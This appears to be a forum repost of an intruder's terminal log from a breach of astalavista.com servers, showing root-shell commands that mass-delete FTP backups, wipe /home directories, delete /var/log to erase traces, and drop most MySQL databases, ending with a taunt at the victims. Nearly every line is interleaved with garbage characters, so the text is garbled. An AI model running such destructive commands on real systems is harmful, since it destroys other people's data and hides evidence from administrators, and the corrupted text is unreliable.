& a; K# {( n1 M+ [( c. |250 CWD command successful.! F; k3 O! W+ A4 h4 G
ftp> ls -la' B" i3 \0 r( w5 N; Q- I8 e
227 Entering Passive Mode (212,254,194,163,2,189)
5 u1 D" g6 ~: E. q150 Opening BINARY mode data connection for ‘file list’.
% `* G" [9 { H3 e7 o! N) X-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar r, }5 r5 {0 t+ z- T( c
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz22 P. \8 Y* {7 o. P5 s5 R- x' i
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2, R3 G6 M. F' I8 S
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
. a( A. J, S( l/ e: d$ h$ n% ]-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar. `9 C# N0 d5 ` `- Q
[snip]
! g7 I, T9 b0 U226 Transfer complete.& f( _$ L0 h0 r4 g8 a1 V
ftp> mdelete *& n: x, @' c, Z2 p, N9 O; \
ftp> ls -la
?8 C; }4 `: D, U; M; Z227 Entering Passive Mode (212,254,194,163,2,193)+ W/ ~, b3 k- ~! N9 ]0 P
150 Opening BINARY mode data connection for ‘file list’.
. A R/ D2 `& F* H226 Transfer complete.
1 `/ P" V; Y6 W" q5 y6 Dftp>
- o3 H6 c2 o1 {
+ ^* A/ i. J- @+ y; Ish-3.2# cd /home
" f$ z% e2 n4 z, ^- Wsh-3.2# ls -la
- c9 _8 C0 W$ C/ \total 120
+ z1 M- U. C. k6 T0 |* rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .- A: {# K# E( a, q! y' k9 u- a
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..2 V; A5 Q6 N2 \, Y6 X# |3 b
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin l B a7 i5 e5 f/ J3 ~1 C L
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
# m/ i' z/ E/ f( N, j-rw——- 1 root root 8192 Jun 3 02:45 aquota.user. Q Y5 I1 V! k1 H" p' C* X& I
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet0 O# S L& w3 {# l
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
" _: N( _; |7 i, @* |/ i, wdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141612 x- D9 s7 c5 ?) @+ H8 I; Q$ l
drwx–x–x 10 com com 4096 Apr 28 12:40 com
# U p: _* u9 s1 Z. a$ @9 w8 edrwxr-xr-x 2 root root 4096 May 17 2007 ftp. d/ p1 S2 _7 v3 f
drwx—— 3 jon jon 4096 Sep 21 2007 jon2 h6 B4 d1 o4 I. M* c, C
drwx—— 2 root root 16384 Sep 11 2007 lost+found
' @" U3 o' I/ Rdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
: ~4 ]1 y, M& Sdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
% o0 U$ L" O J: Pdrwx—— 2 jon jon 4096 Sep 15 2007 test
: a5 x4 R+ u0 Gdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
3 O D7 y) g! W3 M* ]8 y* c6 _9 D$ b/ I" C/ |: m/ I
sh-3.2# rm -rf backup/# x- p' F9 x" D$ ]0 l. o
sh-3.2# rm -rf backup.14161/4 L' S2 S; b/ J4 O: X I
sh-3.2# rm -rf ftp/
" U) i! v& L( Tsh-3.2# rm -rf jon/& b% Q: E- j& h! Z
sh-3.2# rm -rf my/% Y1 d) ^, d8 u9 p3 a& ?' L! j, k) ~, W
sh-3.2# rm -rf mysqldata/
+ O; T$ h3 z/ t- J0 U9 i2 k8 d* }4 Ksh-3.2# rm -rf test/
8 u2 f$ T1 k% U Ush-3.2# rm -rf tmp/
; R+ Q1 F t2 K! Zsh-3.2# cd ~
/ z0 d7 \3 u# i8 ksh-3.2# rm -rf *
* G' e* g. N& Q0 |sh-3.2# rm -rf /var/log/7 e6 v) G& Y2 ?4 j2 n' C
rm: cannot remove directory `/var/log//proftpd’: Directory not empty1 p; Y7 o, a9 N' E* Q `
sh-3.2# rm -rf /home/*+ h8 _7 Z- w/ G! }$ k
sh-3.2# mysql: O$ J$ B5 ?) n; Y' j8 G
Welcome to the MySQL monitor. Commands end with ; or \g.* h+ [* c$ W/ I( g0 v0 i
Your MySQL connection id is 407156
+ s2 f t8 ?% y5 E4 I: w6 D8 g2 H0 OServer version: 5.0.45-community-log MySQL Community Edition (GPL)
' G1 p+ J; M" V1 b; x6 C3 g V3 n$ I3 p8 r+ c& B, l3 c5 J
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
# q0 a. e- i) C* k3 R
( O' d- _ T( emysql> show databases;
! g6 b% t, C/ q9 C" ~+———————–+
, P) L Z3 E4 l3 V; H* E- v| Database |
5 N |7 s& \7 d! q* q+———————–+
" z# x9 y6 E4 }! Q, V| information_schema |4 H# \( C9 a# c8 y
| astanet_ads |2 Z6 m. r/ f: D) p9 n2 U
| astanet_mailing_lists |
" q: K& b% `% W" J7 C| astanet_mediawiki |
* X ^1 W7 k: h5 _6 {- I/ @| astanet_membersystem |
# s9 g$ [0 T1 O c6 e9 ?| com_contrexx |
4 u& j, L" _6 Z `8 I! p: A+ ?; T| com_contrexx2 |
+ [5 V9 l2 v: p, \% K2 |3 G9 u| com_contrexx2_live |- `$ R) l& S" ~. M
| da_roundcube |
* ~" j$ R! u5 M, `| dolphin |$ m# h. V: v* g7 { J
| ideapool |
4 B0 g7 B! g9 ]" T1 n| mysql |
8 v7 B( \0 l) p+ |6 G% d) z% r| test |
/ N$ [& h& X0 D6 Q! A: k| yourmaster |
& i+ T) X6 }. G: Q( V1 a' o+ F+———————–+( X0 ~) [& e/ U. K/ f
14 rows in set (0.03 sec)
- H3 N, Z" { F7 p( `8 h; p i8 ]- w" u) I3 F* U
mysql> drop database astanet_membersystem;( E; o( L" F% P9 m' n+ V; X8 T }8 B
droQuery OK, 46 rows affected (0.81 sec)
K3 N. k% ^8 Y6 `) F1 ~$ z! F/ U, A* ^; ^* w3 _ c4 K
mysql> drop database com_contrexx;
- ]+ n1 H0 R+ z& M( R) G1 P! C0 B- IQuery OK, 211 rows affected (2.72 sec)
' |& A4 `. w! v, x+ b
5 m8 W) N$ R& y$ r5 A/ e( E/ Wmysql> drop database com_contrexx2;
, \+ s$ J6 z0 b9 ^Query OK, 237 rows affected (2.23 sec)
# {8 K1 T" F+ N5 @$ j9 B* k
3 b6 _: J6 y+ X- ymysql> drop database com_contrexx2_live;9 \1 L1 }+ C7 W) a2 M' i
Query OK, 227 rows affected (7.63 sec)
2 g( _; {4 h- d
, P4 V7 X2 Y. Z6 _, |7 T$ |mysql> drop database ideapool;1 _! e$ x0 B* Q! q6 M
Query OK, 69 rows affected (0.19 sec)- m/ K0 I, [, t( H1 M% z
( R8 g8 O3 [( j' p% {! N' O8 dmysql> drop database yourmaster;
. k: C" e2 v8 }# p! ?* z. Z: HQuery OK, 158 rows affected (0.55 sec)
$ }3 Y* k0 M# m5 D: V) A
* U- `% f2 @2 Z, x; zmysql> drop database astanet_ads;
2 @& v" W0 ^$ Z: t* m0 LQuery OK, 9 rows affected (0.11 sec)
9 J# p8 m, w6 g; H& b) j: V
! R) n9 ?1 i8 P" Rmysql> drop database astanet_mailing_lists;
; t# b. |, v8 t0 G L( E$ J" hQuery OK, 24 rows affected (1.47 sec)/ d* x3 i* x% @2 Y6 n, A
% ]7 x# E* P& @0 z
mysql> drop database astanet_mediawiki;
$ e( {5 y4 \1 o- |! c, kQuery OK, 31 rows affected (0.51 sec)
' K- w ]" q1 _3 K3 w, r
7 p U; H" J; \ J; s7 Imysql> show databases;
1 W* x7 B. j2 ~* u& B) W+——————–+! E. g4 \. }) [3 U3 z- [
| Database |
x! G, _3 q; d7 h+——————–+
7 b* m* b: O( F7 R| information_schema |* I+ [7 @, p. t) e* ~; w
| da_roundcube |
* D$ T: F7 |* S: J| dolphin |, x: }) e3 m% h! f$ O
| mysql |4 u5 }9 J& k4 H& Q
| test |
: P; \0 Z+ q) p( {# p, K+——————–+
6 M" ?1 Y7 u/ |8 i8 i* N5 rows in set (0.00 sec)
7 @9 T( m& I2 b- D& p' Z% c6 R# m" N& k7 k
What a journey! We’re not sure exactly why the “Terminator” had any influence on5 ]% C/ M2 d" e, E( D6 Y2 @
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the$ l! t9 O: O: ^$ {& C% h1 o* i
wrong to say this pack of morons *wont be back*.
# [; B' I; r3 F }/ C3 Y! r! | |
发表于 2012-11-6 21:07:34
收藏
支持
反对